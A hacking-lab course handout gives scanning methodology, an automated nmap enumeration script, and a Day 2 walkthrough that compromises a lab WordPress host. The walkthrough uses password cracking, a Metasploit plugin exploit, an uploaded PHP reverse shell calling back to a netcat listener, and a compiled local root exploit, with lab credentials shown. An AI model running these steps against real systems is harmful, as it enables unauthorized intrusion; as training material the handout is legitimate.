· 6 years ago · Sep 05, 2019, 11:08 PM
1The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.
2
3
4Issue 1. Lack of a thorough attack process
5==========================================
6 - Host discovery
7 - Service discovery
8 - Service version discovery
9 - Vulnerability research
10 - Linux (port 111)/Window (port 445) Enumeration
11 - Webserver vulnerability scan
12 - Directory brute force every webserver
13 - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
14 - Brute force all services
15
16
17Issue 2. Lack of automation of the process
18==========================================
19 - Research attacks scripts on the internet to enhance your methodology
20
21
22Issue 3. Failing to document all steps being performed and their output
23=======================================================================
24
25
26Issue 4. Lack of sleep during the exam
27======================================
28
29
30Issue 5. Failing to reboot target machines prior to attack
31==========================================================
32
33
34
35--------------------------------------------------------------------------------------------------------------
36
37
38A good strategy to use to prepare would be:
39
40Step 1. Ensure that you are comfortable with Linux
41--------------------------------------------------
42- LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
43- Comptia Linux+ (You should be just a hair under a Linux system administrator in skill level, simple shell scripting, and well beyond a Linux user skill level)
44
45You should be very comfortable with the material covered in the videos below (Go through all of them twice if you are new to Linux):
46https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
47https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
48https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E
49
50
51
522. You should be comfortable with the following tools:
53------------------------------------------------------
54
55Nmap:
56https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo
57
58Metasploit:
59https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja
60
61Burp Suite:
62https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
63
64Sqlmap:
65https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75
66
67Nikto:
68https://www.youtube.com/watch?v=GH9qn_DBzCk
69
70Enum4Linux:
71https://www.youtube.com/watch?v=hA5raaGOQKQ
72
73RPCINFO/SHOWMOUNT:
74https://www.youtube.com/watch?v=FlRAA-1UXWQ
75
76Hydra:
77https://www.youtube.com/watch?v=rLtj8tEmGso
78
79
80
813. You need to comfortable with basic exploit development
82---------------------------------------------------------
83
84Basic assembly:
85https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB
86
87Basic exploit development (first 5 videos in the playlist):
88https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
89
90
914. You need to be comfortable with privilege escalation
92-------------------------------------------------------
93Linux
94https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
95
96Windows
97https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
98http://www.fuzzysecurity.com/tutorials/16.html
99
100
101
102
103 #################################
104----------- ############### # Day 1: Advanced Scanning Labs # ############### -----------
105 #################################
106
107
108########################
109# Scanning Methodology #
110########################
111
112- Ping Sweep
113What's alive?
114------------
115
116---------------------------Type This-----------------------------------
117sudo nmap -sP 157.166.226.*
118
119-----------------------------------------------------------------------
120
121
122
123 -if -SP yields no results try:
124---------------------------Type This-----------------------------------
125sudo nmap -sL 157.166.226.*
126
127-----------------------------------------------------------------------
128
129
130
131 -Look for hostnames:
132---------------------------Type This-----------------------------------
133sudo nmap -sL 157.166.226.* | grep com
134
135-----------------------------------------------------------------------
136
137
138
139- Port Scan
140What's where?
141------------
142---------------------------Type This-----------------------------------
143sudo nmap -sS 162.243.126.247
144
145-----------------------------------------------------------------------
146
147
148
149- Bannergrab/Version Query
150What versions of software are running
151-------------------------------------
152
153---------------------------Type This-----------------------------------
154sudo nmap -sV 162.243.126.247
155
156-----------------------------------------------------------------------
157
158
159
160
161- Vulnerability Research
162Lookup the banner versions for public exploits
163----------------------------------------------
164http://exploit-db.com
165http://securityfocus.com/bid
166https://packetstormsecurity.com/files/tags/exploit/
167
168
169
170
171
172-----------------------------------------------------------------------------------------------------------------------------
173-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
174-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
175--------------------------------------------------------------------------------------
176Some tools to install:
177---------------------------Type This-----------------------------------
178wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
179gcc propecia.c -o propecia
180sudo cp propecia /bin
181-----------------------------------------------------------------------
182
183
184
185
186##############################
187# Scanning Process to follow #
188##############################
189
190Step 1: Host Discovery
191----------------------
192
193---------------------------Type This-----------------------------------
194nmap -sP 172.31.2.0/24
195
196nmap -sL 172.31.2.0/24
197
198nmap -sS --open -p 22,445 172.31.2.0/24
199
200propecia 172.31.2 22 > file1
201propecia 172.31.2 445 > file2
202cat file1 file2 > file3
203cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
204cat lab.txt
205-----------------------------------------------------------------------
206
207
208Step 2: Port Scan
209-----------------
210nmap -sS <IP-ADDRESS>
211nmap -sU -p 69,161 <IP-ADDRESS>
212
213
214---------------------------Type This-----------------------------------
215sudo nmap -sS 172.31.2.0/24
216sudo nmap -sU -p 69,161 172.31.2.0/24
217-----------------------------------------------------------------------
218
219
220Step 3: Bannergrab
221------------------
222nmap -sV <IP-ADDRESS>
223nmap -sV -p- <IP-ADDRESS>
224 |
225 ----> Vulnerability Research
226
227---------------------------Type This-----------------------------------
228sudo nmap -sV 172.31.2.0/24
229-----------------------------------------------------------------------
230
231
232
233
234Step 4: Enumerate common Windows/Linux file sharing services
235Step 3 is where most people STOP, and you need to move on and look deeper
236------------------------------------------------------------
237
238---------------------------Type This-----------------------------------
239sudo apt install smbclient libnss-winbind winbind
240git clone https://github.com/portcullislabs/enum4linux.git
241cd enum4linux/
242perl enum4linux.pl -U 172.31.2.11
243
244nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.86
245---------------------------------------------------------------------------------------
246
247
248
249Step 5: Vulnerability Scan the webservers
250-----------------------------------------
251git clone https://github.com/sullo/nikto.git Nikto2
252
253cd Nikto2/program
254
255perl nikto.pl -h <IP-ADDRESS>
256
257
258
259Step 6: Directory Bruteforce every webserver
260--------------------------------------------
261sudo apt install -y libcurl4-openssl-dev
262
263git clone https://github.com/v0re/dirb.git
264
265cd dirb/
266
267./configure
268
269make
270
271./dirb
272
273./dirb http://<IP-ADDRESS> wordlists/big.txt
274
275
276
277
278
279Step 7: Analyze source code of all webpages found
280-------------------------------------------------
281lynx -dump "http://<IP-ADDRESS>" | grep -o "http:.*" > links
282
283If you ever need to download an entire Web site, perhaps for off-line viewing, wget can do the job—for example:
284
285$ wget \
286 --recursive \
287 --no-clobber \
288 --page-requisites \
289 --html-extension \
290 --convert-links \
291 --restrict-file-names=windows \
292 --domains website.org \
293 --no-parent \
294 www.website.org/tutorials/html/
295
296
297This command downloads the Web site www.website.org/tutorials/html/.
298
299The options are:
300
301--recursive: download the entire Web site.
302
303--domains website.org: don't follow links outside website.org.
304
305--no-parent: don't follow links outside the directory tutorials/html/.
306
307--page-requisites: get all the elements that compose the page (images, CSS and so on).
308
309--html-extension: save files with the .html extension.
310
311--convert-links: convert links so that they work locally, off-line.
312
313--restrict-file-names=windows: modify filenames so that they will work in Windows as well.
314
315--no-clobber: don't overwrite any existing files (used in case the download is interrupted and resumed).
316
317
318
319Step 8: Bruteforce any services you find
320----------------------------------------
321sudo apt install -y zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libssh-dev libmysqlclient-dev libpq-dev libsvn-devcd ~/toolz
322git clone https://github.com/vanhauser-thc/thc-hydra.git
323cd thc-hydra
324./configure
325make
326hydra -L username.txt -P passlist.txt ftp://<IP-ADDRESS
327hydra -l user -P passlist.txt ftp://<IP-ADDRESS
328
329
330
331##################
332# Host Discovery #
333##################
334
335Reason:
336-------
337You have to discover the reachable hosts in the network before you can attack them.
338
339
340Hosts discovery syntax:
341-----------------------
342 nmap -sP 172.31.2.0/24
343 propecia 172.31.2 22 > file1
344 propecia 172.31.2 445 > file2
345 cat file1 file2 > file3
346 cat file3 | sort -t . -k 3,3n -k 4,4n | uniq > lab.txt
347 cat lab.txt
348
349Issues:
350-------
351Issue we had to deal with was hosts that didn't respond to ICMP
352
353
354 Hosts discovered:
355 -----------------
356 172.31.2.11
357 172.31.2.14
358 172.31.2.47
359 172.31.2.64
360 172.31.2.86
361 172.31.2.117
362 172.31.2.157
363 172.31.2.217
364 172.31.2.238
365
366
367
368
369
370
371#####################
372# Service Discovery #
373#####################
374
375Reason:
376-------
377Identifying what services are running on what hosts allows for you to map the network topology.
378
379
380
381Port Scan syntax:
382 sudo nmap -sS -Pn -iL lab.txt
383 sudo nmap -sU -p69,161 -Pn -iL lab.txt
384
385
386
387Services discovered:
388--------------------
389
390joe@metasploit-box:~$ sudo nmap -sS -Pn -iL lab.txt
391
392Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:52 UTC
393Nmap scan report for 172.31.2.11
394Host is up (0.087s latency).
395Not shown: 995 filtered ports
396PORT STATE SERVICE
39721/tcp open ftp
398139/tcp open netbios-ssn
399445/tcp open microsoft-ds
4003389/tcp open ms-wbt-server
4019999/tcp open abyss
402
403Nmap scan report for 172.31.2.11
404Host is up.
405
406PORT STATE SERVICE
40769/udp open|filtered tftp
408161/udp open|filtered snmp
409
410
411Nmap scan report for 172.31.2.14
412Host is up (0.087s latency).
413Not shown: 995 filtered ports
414PORT STATE SERVICE
41521/tcp open ftp
416139/tcp open netbios-ssn
417445/tcp open microsoft-ds
4183389/tcp open ms-wbt-server
4199999/tcp open abyss
420
421
422Nmap scan report for 172.31.2.14
423Host is up.
424
425PORT STATE SERVICE
42669/udp open|filtered tftp
427161/udp open|filtered snmp
428
429
430Nmap scan report for 172.31.2.47
431Host is up (0.086s latency).
432Not shown: 998 closed ports
433PORT STATE SERVICE
43422/tcp open ssh
43580/tcp open http
436
437Nmap scan report for 172.31.2.64
438Host is up (0.087s latency).
439Not shown: 997 closed ports
440PORT STATE SERVICE
44122/tcp open ssh
44280/tcp open http
4436667/tcp open irc
444
445Nmap scan report for 172.31.2.86
446Host is up (0.086s latency).
447Not shown: 989 closed ports
448PORT STATE SERVICE
44922/tcp open ssh
45053/tcp open domain
45180/tcp open http
452110/tcp open pop3
453111/tcp open rpcbind
454139/tcp open netbios-ssn
455143/tcp open imap
456445/tcp open microsoft-ds
457993/tcp open imaps
458995/tcp open pop3s
4598080/tcp open http-proxy
460
461Nmap scan report for 172.31.2.117
462Host is up (0.087s latency).
463Not shown: 997 closed ports
464PORT STATE SERVICE
46522/tcp open ssh
46680/tcp open http
4672020/tcp open xinupageserver
468
469Nmap scan report for 172.31.2.157
470Host is up (0.087s latency).
471Not shown: 997 closed ports
472PORT STATE SERVICE
47321/tcp open ftp
47422/tcp open ssh
47580/tcp open http
476
477Nmap scan report for 172.31.2.217
478Host is up (0.087s latency).
479Not shown: 997 closed ports
480PORT STATE SERVICE
48122/tcp open ssh
48280/tcp open http
4833260/tcp open iscsi
484
485Nmap scan report for 172.31.2.238
486Host is up (0.087s latency).
487Not shown: 997 closed ports
488PORT STATE SERVICE
48922/tcp open ssh
49080/tcp open http
4916969/tcp open acmsoda
492
493Nmap done: 9 IP addresses (9 hosts up) scanned in 14.82 seconds
494
495
496
497
498
499
500
501
502
503##############################################
504# Service Version Discovery (Bannergrabbing) #
505##############################################
506Reason:
507-------
508Identifying what versions of services are running on what hosts allows for you to determine if the hosts are vulnerable to attack.
509
510
511
512Port Scan syntax:
513
514joe@metasploit-box:~$ sudo nmap -sV -Pn -iL lab.txt
515
516Starting Nmap 7.60SVN ( https://nmap.org ) at 2018-05-05 14:56 UTC
517Nmap scan report for 172.31.2.11
518Host is up (0.087s latency).
519Not shown: 995 filtered ports
520PORT STATE SERVICE VERSION
52121/tcp open ftp FreeFloat ftpd 1.00
522139/tcp open netbios-ssn Microsoft Windows netbios-ssn
523445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
5243389/tcp open ms-wbt-server Microsoft Terminal Service
5259999/tcp open abyss?
526Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
527
528Nmap scan report for 172.31.2.14
529Host is up (0.087s latency).
530Not shown: 995 filtered ports
531PORT STATE SERVICE VERSION
53221/tcp open ftp FreeFloat ftpd 1.00
533139/tcp open netbios-ssn Microsoft Windows netbios-ssn
534445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
5353389/tcp open ms-wbt-server Microsoft Terminal Service
5369999/tcp open abyss?
537Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003
538
539Nmap scan report for 172.31.2.47
540Host is up (0.087s latency).
541Not shown: 998 closed ports
542PORT STATE SERVICE VERSION
54322/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
54480/tcp open http Apache httpd 2.2.22 ((Ubuntu))
545Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
546
547Nmap scan report for 172.31.2.64
548Host is up (0.087s latency).
549Not shown: 997 closed ports
550PORT STATE SERVICE VERSION
55122/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
55280/tcp open http Apache httpd 2.4.7 ((Ubuntu))
5536667/tcp open irc ngircd
554Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
555
556Nmap scan report for 172.31.2.86
557Host is up (0.087s latency).
558Not shown: 989 closed ports
559PORT STATE SERVICE VERSION
56022/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
56153/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux)
56280/tcp open http Apache httpd 2.4.7 ((Ubuntu))
563110/tcp open pop3 Dovecot pop3d
564111/tcp open rpcbind 2-4 (RPC #100000)
565139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
566143/tcp open imap Dovecot imapd (Ubuntu)
567445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
568993/tcp open ssl/imap Dovecot imapd (Ubuntu)
569995/tcp open ssl/pop3 Dovecot pop3d
5708080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
571Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel, cpe:/o:campmoca;:ubuntu_linux
572
573Nmap scan report for 172.31.2.117
574Host is up (0.086s latency).
575Not shown: 997 closed ports
576PORT STATE SERVICE VERSION
57722/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
57880/tcp open http Apache httpd 2.4.7 ((Ubuntu))
5792020/tcp open ftp vsftpd 2.0.8 or later
580Service Info: Host: minotaur; OS: Linux; CPE: cpe:/o:linux:linux_kernel
581
582Nmap scan report for 172.31.2.157
583Host is up (0.086s latency).
584Not shown: 997 closed ports
585PORT STATE SERVICE VERSION
58621/tcp open ftp vsftpd 2.0.8 or later
58722/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
58880/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
589
590Nmap scan report for 172.31.2.217
591Host is up (0.087s latency).
592Not shown: 997 closed ports
593PORT STATE SERVICE VERSION
59422/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
59580/tcp open http nginx
5963260/tcp open iscsi?
597Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
598
599Nmap scan report for 172.31.2.238
600Host is up (0.087s latency).
601Not shown: 997 closed ports
602PORT STATE SERVICE VERSION
60322/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
60480/tcp open http nginx 1.6.2
6056969/tcp open acmsoda?
606Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
607
608Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
609Nmap done: 9 IP addresses (9 hosts up) scanned in 170.68 seconds
610
611
612
613
614
615
616
617-----------------------------------------------------------------------------------------------------------------------------
618-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
619-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
620--------------------------------------------------------------------------------------
621
622#!/bin/bash
623
624# Script made during the CyberWar class for the students to play with, debug, and improve.
625# Take a look at the following websites for ideas:
626# https://github.com/commonexploits/port-scan-automation
627# https://www.commonexploits.com/penetration-testing-scripts/
628# https://github.com/averagesecurityguy/scripts
629# https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
630
631
632
633# Some thoughts of things to add to this script:
634# Shodan queries (API key)
635# AWS scanning (need credentials)
636# Jenkins scanning
637# Active Directory enumeration
638# Github scanning (API key required)
639# Blockchain platforms
640
641
642
643
644
645
646
647#############################################
648# Check to see if script is running as root #
649#############################################
650if [ "$EUID" -ne 0 ]
651 then echo "Please run as root"
652 exit
653fi
654
655
656####################################
657# Check to see if gcc is installed #
658####################################
659file1="/usr/bin/gcc"
660if [ -f "$file1" ]
661then
662 echo "$file is installed."
663 clear
664else
665 echo "$file not found."
666 echo Installing gcc
667 apt-get install -y gcc
668 clear
669fi
670
671########################
672# Make the directories #
673########################
674cd /tmp
675rm -rf customerAudit/
676rm -rf NetworkAudit/
677mkdir -p /tmp/NetworkAudit/discovered_services/
678mkdir -p /tmp/NetworkAudit/scan/windows/
679mkdir -p /tmp/NetworkAudit/scan/sunrpc/
680mkdir -p /tmp/NetworkAudit/scan/ssh/
681mkdir -p /tmp/NetworkAudit/scan/ftp/
682mkdir -p /tmp/NetworkAudit/scan/http/
683mkdir -p /tmp/NetworkAudit/scan/telnet/
684mkdir -p /tmp/NetworkAudit/scan/pop3/
685mkdir -p /tmp/NetworkAudit/scan/printers/
686mkdir -p /tmp/NetworkAudit/scan/mssql_databases/
687mkdir -p /tmp/NetworkAudit/scan/oracle_databases/
688mkdir -p /tmp/NetworkAudit/scan/mysql_databases/
689mkdir -p /tmp/NetworkAudit/scan/mongodb_databases/
690
691
692#####################
693# Download propecia #
694#####################
695file2="/bin/propecia"
696if [ -f "$file2" ]
697then
698 echo "$file is installed."
699 clear
700else
701 echo "$file not found."
702 echo Installing propecia
703 cd /tmp
704 wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
705 gcc propecia.c -o propecia
706 cp propecia /bin
707fi
708
709######################
710# Find Windows Hosts #
711######################
712clear
713echo "Scanning for windows hosts."
714propecia 172.31.2 445 >> /tmp/NetworkAudit/discovered_services/windows_hosts
715clear
716echo "Done scanning for windows hosts. FTP is next."
717
718
719##################
720# Find FTP Hosts #
721##################
722echo "Scanning for hosts running FTP."
723propecia 172.31.2 21 >> /tmp/NetworkAudit/discovered_services/ftp_hosts
724clear
725echo "Done scanning for FTP hosts. SSH is next."
726
727##################
728# Find SSH Hosts #
729##################
730echo "Scanning for hosts running SSH."
731propecia 172.31.2 22 >> /tmp/NetworkAudit/discovered_services/ssh_hosts
732clear
733echo "Done scanning for SSH hosts. POP3 is next."
734
735
736###################
737# Find POP3 Hosts #
738###################
739echo "Scanning for hosts running POP3."
740propecia 172.31.2 110 >> /tmp/NetworkAudit/discovered_services/pop3_hosts
741clear
742echo "Done scanning for POP3 hosts. SunRPC is next."
743
744
745#####################
746# Find SunRPC Hosts #
747#####################
748echo "Scanning for hosts running SunRPC."
749propecia 172.31.2 111 >> /tmp/NetworkAudit/discovered_services/sunrpc_hosts
750clear
751echo "Done scanning for SunRPC hosts. Telnet is next."
752
753
754#####################
755# Find Telnet Hosts #
756#####################
757echo "Scanning for hosts running Telnet."
758propecia 172.31.2 23 >> /tmp/NetworkAudit/discovered_services/telnet_hosts
759clear
760echo "Done scanning for Telnet hosts. HTTP is next."
761
762
763###################
764# Find HTTP Hosts #
765###################
766echo "Scanning for hosts running HTTP"
767propecia 172.31.2 80 >> /tmp/NetworkAudit/discovered_services/http_hosts
768clear
769echo "Done scanning for HTTP hosts. HTTPS hosts are next."
770
771
772###################
773# Find HTTPS Hosts #
774###################
775echo "Scanning for hosts running HTTP"
776propecia 172.31.2 443 >> /tmp/NetworkAudit/discovered_services/https_hosts
777clear
778echo "Done scanning for HTTPS hosts. Databases are next."
779
780
781##################
782# Find Databases #
783##################
784echo "Scanning for hosts running MS SQL Server"
785propecia 172.31.2 1433 >> /tmp/NetworkAudit/discovered_services/mssql_hosts
786clear
787
788echo "Scanning for hosts running Oracle"
789propecia 172.31.2 1521 >> /tmp/NetworkAudit/discovered_services/oracle_hosts
790clear
791
792echo "Scanning for hosts running Postgres"
793propecia 172.31.2 5432 >> /tmp/NetworkAudit/discovered_services/postgres_hosts
794clear
795
796echo "Scanning for hosts running MongoDB"
797propecia 172.31.2 27017 >> /tmp/NetworkAudit/discovered_services/mongodb_hosts
798clear
799
800echo "Scanning for hosts running MySQL"
801propecia 172.31.2 3306 >> /tmp/NetworkAudit/discovered_services/mysql_hosts
802clear
803echo "Done doing the host discovery. Moving on to nmap'ing each host discovered. Windows hosts are first."
804
805
806###############################
807# Ok, let's do the NMAP files #
808###############################
809clear
810# Windows
811for x in `cat /tmp/NetworkAudit/discovered_services/windows_hosts` ; do nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect $x > /tmp/NetworkAudit/scan/windows/$x ; done
812echo "Done with Windows."
813
814clear
815# FTP
816for x in `cat /tmp/NetworkAudit/discovered_services/ftp_hosts` ; do nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor $x > /tmp/NetworkAudit/scan/ftp/$x ; done
817echo "Done with FTP."
818
819clear
820# SSH
821for x in `cat /tmp/NetworkAudit/discovered_services/ssh_hosts` ; do nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos $x > /tmp/NetworkAudit/scan/ssh/$x ; done
822echo "Done with SSH."
823
824clear
825# SUNRPC
826for x in `cat /tmp/NetworkAudit/discovered_services/sunrpc_hosts` ; do nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo $x > /tmp/NetworkAudit/scan/sunrpc/$x ; done
827echo "Done with SunRPC."
828
829clear
830# POP3
831for x in `cat /tmp/NetworkAudit/discovered_services/pop3_hosts` ; do nmap -Pn -n --open -p110 --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg $x > /tmp/NetworkAudit/scan/pop3/$x ; done
832echo "Done with POP3."
833
834# clear
835# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
836# as a good reference for what nmap nse scripts to run against port 80 and 443
837# for x in `cat /tmp/NetworkAudit/discovered_services/http_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
838# echo "Done with HTTP."
839
840
841# clear
842# HTTP Fix this...maybe use https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
843# as a good reference for what nmap nse scripts to run against port 80 and 443
844# for x in `cat /tmp/NetworkAudit/discovered_services/https_hosts` ; do nmap -sV -O --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" $x > /tmp/NetworkAudit/scan/http/$x ; done
845# echo "Done with HTTP."
846
847
848clear
849# SQL Servers
850for x in `cat /tmp/NetworkAudit/discovered_services/mssql_hosts` ; do -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info $x > /tmp/NetworkAudit/scan/mssql_databases/$x ; done
851echo "Done with MS SQL."
852
853clear
854# Oracle Servers
855# FIX THIS: needs brute force wordlists for this to run correctly
856# for x in `cat /tmp/NetworkAudit/discovered_services/oracle_hosts` ; do nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt $x >> /tmp/NetworkAudit/scan/oracle_databases/$x ; done
857# echo "Done with Oracle."
858
859clear
860# MongoDB
861for x in `cat /tmp/NetworkAudit/discovered_services/mongodb_hosts` ; do nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info $x > /tmp/NetworkAudit/scan/mongodb_databases/$x ; done
862echo "Done with MongoDB."
863
864
865clear
866# MySQL Servers
867for x in `cat /tmp/NetworkAudit/discovered_services/mysql_hosts` ; do nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables $x >> /tmp/NetworkAudit/scan/mysql_databases/$x ; done
868echo "Done with MySQL."
869
870
871# Add postgres nse scripts
872# References:
873# https://nmap.org/nsedoc/lib/pgsql.html
874# https://nmap.org/nsedoc/scripts/pgsql-brute.html
875#
876
877echo " "
878echo " "
879sleep 1
880clear
881echo "Done, now check your results."
882sleep 2
883clear
884cd /tmp/NetworkAudit/scan/
885ls
886
887
888
889----------------------------------------------------------------------------------------------------------------------------
890-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
891-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
892--------------------------------------------------------------------------------------
893
894 ######################################
895----------- ############### # Day 2: Attacking Hosts in the lab ################ -----------
896 ######################################
897
898######################
899# Attacking Minotaur #
900######################
901
902Step 1: Portscan/Bannergrab the target host
903---------------------------Type This-----------------------------------
904sudo nmap -sV 172.31.2.117
905-----------------------------------------------------------------------
906
907
908
909Step 2: Vulnerability scan the web server
910---------------------------Type This-----------------------------------
911nikto.pl -h 172.31.2.117
912-----------------------------------------------------------------------
913
914
915
916Step 3: Directory brute-force the webserver
917---------------------------Type This-----------------------------------
918dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
919-----------------------------------------------------------------------
920
921### dirb output ###
922==> DIRECTORY: http://172.31.2.117/bull/
923-----------------------------------------------------------------------
924
925
926Step 4: Run wordpress vulnerability scanner
927---------------------------Type This-----------------------------------
928wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
929
930
931cewl -w words.txt http://172.31.2.117/bull/
932
933
934cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
935
936wc -l whateverbro.txt
937
938john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
939
940wc -l words-john.txt
941
942wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
943-----------------------------------------------------------------------
944
945
946
947
948
949Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
950---------------------------Type This-----------------------------------
951msfconsole
952
953use exploit/unix/webapp/wp_slideshowgallery_upload
954
955set RHOST 172.31.2.117
956
957set RPORT 80
958
959set TARGETURI /bull
960
961set WP_USER bully
962
963set WP_PASSWORD Bighornedbulls
964
965exploit
966-----------------------------------------------------------------------
967
968Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
969This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
970and then from the lab network attacking other students.
971
972
973---------------------------Type This-----------------------------------
974wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
975
976tar -zxvf php-reverse-shell-1.0.tar.gz
977
978cd ~/toolz/php-reverse-shell-1.0/
979
980nano php-reverse-shell.php
981-----------------------------------------------------------------------
982 ***** change the $ip and $port variables to a host that you have already compromised in the network
983 ***** for this example I chose 172.31.2.64 and kept port 1234
984
985
986---------------------------Type This-----------------------------------
987chmod 777 php-reverse-shell.php
988cp php-reverse-shell.php ..
989-----------------------------------------------------------------------
990
991
992
993Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
994Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
995--------------------------Type This-----------------------------------
996python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
997
998-----------------------------------------------------------------------
999
1000
1001
1002Set up netcat listener on previously compromised host
1003---------------------------Type This-----------------------------------
1004ssh -l webmin 172.31.2.64
1005 webmin1980
1006
1007
1008nc -lvp 1234
1009-----------------------------------------------------------------------
1010
1011
1012
1013
1014---------------------Type This in your browser ------------------------
1015http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
1016-----------------------------------------------------------------------
1017
1018
1019Now check your listener to see if you got the connection
1020---------------------------Type This-----------------------------------
1021id
1022
1023/sbin/ifconfig
1024
1025python -c 'import pty;pty.spawn("/bin/bash")'
1026
1027---------------------------Type This-----------------------------------
1028cd /tmp
1029cat >> exploit2.c << out
1030-----------------------------------------------------------------------
1031**************paste in the content from here *****************
1032https://www.exploit-db.com/raw/37292/
1033
1034**************hit enter a few times *****************
1035
1036---------------------------Type This-----------------------------------
1037out
1038
1039
1040gcc -o boom2 exploit2.c
1041
1042./boom2
1043
1044id
1045-----------------------------------------------------------------------
1046
1047
1048
1049
1050---------------------------Type This-----------------------------------
1051sudo nmap -sV 172.31.2.181
1052-----------------------------------------------------------------------
1053PORT STATE SERVICE VERSION
